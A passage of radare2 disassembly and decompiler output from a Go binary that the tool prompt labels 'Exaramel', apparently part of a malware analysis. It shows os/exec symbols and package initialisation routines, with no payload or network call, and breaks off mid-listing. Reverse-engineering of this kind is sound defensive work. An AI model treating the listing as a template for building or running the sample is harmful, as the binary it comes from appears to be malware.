<li class="li1"><div class="de1"><span class="nu0">0x326c6</span> <span class="nu0">22</span> <span class="nu0">21</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>stdout</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x326dc</span> <span class="nu0">22</span> <span class="nu0">21</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>stderr</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x326f2</span> <span class="nu0">32</span> <span class="nu0">31</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>writerDescriptor</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32712</span> <span class="nu0">32</span> <span class="nu0">31</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>closeDescriptors</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32732</span> <span class="nu0">21</span> <span class="nu0">20</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>Start</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32747</span> <span class="nu0">27</span> <span class="nu0">26</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>ExitError<span class="br0">&#41;</span><span class="sy0">.</span>Error</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32762</span> <span class="nu0">20</span> <span class="nu0">19</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>Wait</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32776</span> <span class="nu0">26</span> <span class="nu0">25</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>StdoutPipe</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32790</span> <span class="nu0">26</span> <span class="nu0">25</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>StderrPipe</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x327aa</span> <span class="nu0">15</span> <span class="nu0">14</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>init<span class="sy0">.</span>1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x327b9</span> <span class="nu0">23</span> <span class="nu0">22</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>findExecutable</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x327d0</span> <span class="nu0">17</span> <span class="nu0">16</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>LookPath</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x327e1</span> <span class="nu0">29</span> <span class="nu0">28</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>interfaceEqual<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x327fe</span> <span class="nu0">27</span> <span class="nu0">26</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>stdin<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32819</span> <span class="nu0">38</span> <span class="nu0">37</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>writerDescriptor<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x3283f</span> <span class="nu0">27</span> <span class="nu0">26</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>Start<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x3285a</span> <span class="nu0">27</span> <span class="nu0">26</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>Start<span class="sy0">.</span>func2</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32875</span> <span class="nu0">21</span> <span class="nu0">20</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>init<span class="sy0">.</span>1<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x3288a</span> <span class="nu0">13</span> <span class="nu0">12</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>init <span class="sy0">&lt;====</span></div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">void sym<span class="sy0">.</span>os_exec<span class="sy0">.</span>init<span class="br0">&#40;</span>undefined8 param_1<span class="sy0">,</span> undefined8 param_2<span class="sy0">,</span> int64_t param_3<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; uint64_t <span class="sy0">*</span>puVar1<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; int64_t extraout_RDX<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; int64_t in_FS_OFFSET<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; undefined8 uStack24<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; undefined8 uStack16<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">while</span> <span class="br0">&#40;</span>puVar1 <span class="sy0">=</span> <span class="br0">&#40;</span>uint64_t <span class="sy0">*</span><span class="br0">&#41;</span><span class="br0">&#40;</span><span class="sy0">*</span><span class="br0">&#40;</span>int64_t <span class="sy0">*</span><span class="br0">&#41;</span><span class="br0">&#40;</span>in_FS_OFFSET <span class="sy0">+</span> <span class="nu0">0xfffffff8</span><span class="br0">&#41;</span> <span class="sy0">+</span> <span class="nu0">0x10</span><span class="br0">&#41;</span><span class="sy0">,</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">*</span><span class="br0">&#40;</span>BADSPACEBASE <span class="sy0">**</span><span class="br0">&#41;</span><span class="nu0">0x20</span> <span class="sy0">&lt;</span> <span class="br0">&#40;</span>undefined <span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">*</span>puVar1 || <span class="br0">&#40;</span>undefined <span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">*</span><span class="br0">&#40;</span>BADSPACEBASE <span class="sy0">**</span><span class="br0">&#41;</span><span class="nu0">0x20</span> <span class="sy0">==</span> <span class="br0">&#40;</span>undefined <span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">*</span>puVar1<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>morestack_noctxt<span class="br0">&#40;</span>param_1<span class="sy0">,</span> param_2<span class="sy0">,</span> param_3<span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; param_3 <span class="sy0">=</span> extraout_RDX<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span><span class="nu0">1</span> <span class="sy0">&lt;</span> <span class="br0">&#40;</span>uint8_t<span class="br0">&#41;</span>obj<span class="sy0">.</span>os_exec<span class="sy0">.</span>initdone<span class="sy0">.</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span>obj<span class="sy0">.</span>os_exec<span class="sy0">.</span>initdone<span class="sy0">.</span> <span class="sy0">==</span> <span class="br0">&#40;</span>code<span class="br0">&#41;</span><span class="nu0">0x1</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>throwinit<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">do</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; invalidInstructionException<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span> <span class="kw1">while</span><span class="br0">&#40;</span> <span class="kw4">true</span> <span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; obj<span class="sy0">.</span>os_exec<span class="sy0">.</span>initdone<span class="sy0">.</span> <span class="sy0">=</span> <span class="br0">&#40;</span>code<span class="br0">&#41;</span><span class="nu0">0x1</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>bytes<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>context<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span><span class="kw3">io</span><span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span><span class="kw3">os</span><span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>path_filepath<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>strconv<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>strings<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>sync<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>syscall<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>errors<span class="sy0">.</span>New<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; _obj<span class="sy0">.</span>os_exec<span class="sy0">.</span>ErrNotFound <span class="sy0">=</span> uStack24<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span>_obj<span class="sy0">.</span>runtime<span class="sy0">.</span>writeBarrier <span class="sy0">==</span> <span class="nu0">0</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">*</span><span class="br0">&#40;</span>undefined8 <span class="sy0">*</span><span class="br0">&#41;</span><span class="nu0">0x826548</span> <span class="sy0">=</span> uStack16<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span> <span class="kw1">else</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>writebarrierptr<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>os_exec<span class="sy0">.</span>init<span class="sy0">.</span>1<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; obj<span class="sy0">.</span>os_exec<span class="sy0">.</span>initdone<span class="sy0">.</span> <span class="sy0">=</span> <span class="br0">&#40;</span>code<span class="br0">&#41;</span><span class="nu0">0x2</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; <span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span> CALL XREF from sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>init @ <span class="nu0">0x64623b</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span><span class="co1">-- sym.go.os_exec.init:</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">/</span> <span class="nu0">234</span><span class="sy0">:</span> sym<span class="sy0">.</span>os_exec<span class="sy0">.</span>init <span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">| bp<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| sp<span class="sy0">:</span> <span class="nu0">4</span> <span class="br0">&#40;</span>vars <span class="nu0">4</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| rg<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00623e10</span> &nbsp; &nbsp; &nbsp;mov rcx<span class="sy0">,</span> qword fs<span class="sy0">:</span><span class="br0">&#91;</span><span class="nu0">0xfffffffffffffff8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00623e19</span> &nbsp; &nbsp; &nbsp;cmp rsp<span class="sy0">,</span> qword <span class="br0">&#91;</span>rcx <span class="sy0">+</span> <span class="nu0">0x10</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">,=&lt;</span> <span class="nu0">0x00623e1d</span> &nbsp; &nbsp; &nbsp;jbe <span class="nu0">0x623ef0</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x00623e23</span> &nbsp; &nbsp; &nbsp;sub rsp<span class="sy0">,</span> <span class="nu0">0x28</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span> <span class="co1">---------------------------</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x0064623b</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>os_exec<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00646240</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>path_filepath<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">2</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00646245</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>regexp<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">3</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x0064624a</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">4</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x0064624f</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>strconv<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">5</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00646254</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>strings<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">6</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00646259</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>syscall<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">7</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x0064625e</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span><span class="kw3">time</span><span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00646263</span> &nbsp; &nbsp; &nbsp;mov byte <span class="br0">&#91;</span>obj<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>initdone<span class="sy0">.</span><span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">2</span> &nbsp; &nbsp;<span class="sy0">;</span> <span class="br0">&#91;</span><span class="nu0">0x843345</span><span class="sy0">:</span><span class="nu0">1</span><span class="br0">&#93;</span><span class="sy0">=</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x0064626a</span> &nbsp; &nbsp; &nbsp;mov rbp<span class="sy0">,</span> qword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x0064626e</span> &nbsp; &nbsp; &nbsp;add rsp<span class="sy0">,</span> <span class="nu0">8</span></div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span> CALL XREF from sym<span class="sy0">.</span>main<span class="sy0">.</span>init @ <span class="nu0">0x648a74</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span><span class="co1">-- sym.go.app_vendor_worker.init:</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">/</span> <span class="nu0">173</span><span class="sy0">:</span> sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>init <span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">| bp<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| sp<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| rg<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x006461d0</span> &nbsp; &nbsp; &nbsp;mov rcx<span class="sy0">,</span> qword fs<span class="sy0">:</span><span class="br0">&#91;</span><span class="nu0">0xfffffffffffffff8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x006461d9</span> &nbsp; &nbsp; &nbsp;cmp rsp<span class="sy0">,</span> qword <span class="br0">&#91;</span>rcx <span class="sy0">+</span> <span class="nu0">0x10</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">,=&lt;</span> <span class="nu0">0x006461dd</span> &nbsp; &nbsp; &nbsp;jbe <span class="nu0">0x646273</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x006461e3</span> &nbsp; &nbsp; &nbsp;sub rsp<span class="sy0">,</span> <span class="nu0">8</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span> <span class="co1">---------------------------</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a74</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a79</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_github<span class="sy0">.</span>com_satori_go_2euuid<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">2</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a7e</span> &nbsp; &nbsp; &nbsp;mov byte <span class="br0">&#91;</span>obj<span class="sy0">.</span>main<span class="sy0">.</span>initdone<span class="sy0">.</span><span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">2</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span> <span class="br0">&#91;</span><span class="nu0">0x843374</span><span class="sy0">:</span><span class="nu0">1</span><span class="br0">&#93;</span><span class="sy0">=</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a85</span> &nbsp; &nbsp; &nbsp;mov rbp<span class="sy0">,</span> qword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a89</span> &nbsp; &nbsp; &nbsp;add rsp<span class="sy0">,</span> <span class="nu0">8</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a8d</span> &nbsp; &nbsp; &nbsp;ret</div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="sy0">;</span> CODE XREF from sym<span class="sy0">.</span>main<span class="sy0">.</span>init @ <span class="nu0">0x6489fd</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a8e</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>morestack_noctxt &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">3</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">\ &nbsp; &nbsp; &nbsp; `<span class="sy0">=&lt;</span> <span class="nu0">0x00648a93</span> &nbsp; &nbsp; &nbsp;jmp sym<span class="sy0">.</span>main<span class="sy0">.</span>init</div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00648a98</span> &nbsp; &nbsp; &nbsp;int3</div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00648a99</span> &nbsp; &nbsp; &nbsp;int3</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x00648a23</span> <span class="br0">&#91;</span>xAdvc<span class="br0">&#93;</span><span class="nu0">0</span> <span class="nu0">0</span><span class="sy0">%</span> <span class="nu0">180</span> Exaramel<span class="br0">&#93;</span><span class="sy0">&gt;</span> pd $r @ sym<span class="sy0">.</span>main<span class="sy0">.</span>init<span class="sy0">+</span><span class="nu0">51</span> <span class="sy0">#</span> <span class="nu0">0x648a23</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="sy0">;</span> CODE XREF from sym<span class="sy0">.</span>main<span class="sy0">.</span>init @ <span class="nu0">0x648a18</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp;<span class="sy0">,==&lt;</span> <span class="nu0">0x00648a23</span> &nbsp; &nbsp; &nbsp;<span class="nu0">7507</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jne <span class="nu0">0x648a2c</span></div></li>
